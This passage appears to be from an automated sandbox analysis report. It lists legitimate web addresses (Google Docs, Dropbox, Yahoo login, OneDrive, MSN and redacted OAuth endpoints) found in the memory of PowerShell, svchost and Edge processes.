                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                    Source: svchost.exe, 0000000C.00000003.2321523303.0000014A528AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                    Source: svchost.exe, 0000000C.00000003.2321523303.0000014A52850000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1451D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E1460F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14594B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A409E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                    Source: msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                    Source: msedge.exe, 0000000A.00000002.2427733245.00002CFC003A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                    Source: msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/Y
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                    Source: powershell.exe, 00000003.00000002.2465180795.000002E155020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: msedge.exe, 0000001C.00000002.2499091126.0000533000300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                    Source: powershell.exe, 00000003.00000002.2436196063.000002E145346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E1453CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E145375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2436196063.000002E14535E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4982000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A497D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A499D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A49FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2613958790.000001A0A4955000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                    Source: msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                    Source: msedge.exe, 0000000A.00000003.2325964706.00002CFC00280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2325363786.00002CFC0027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000A.00000003.2327324451.00002CFC00284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2481126910.000053300027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2480927912.0000533000278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
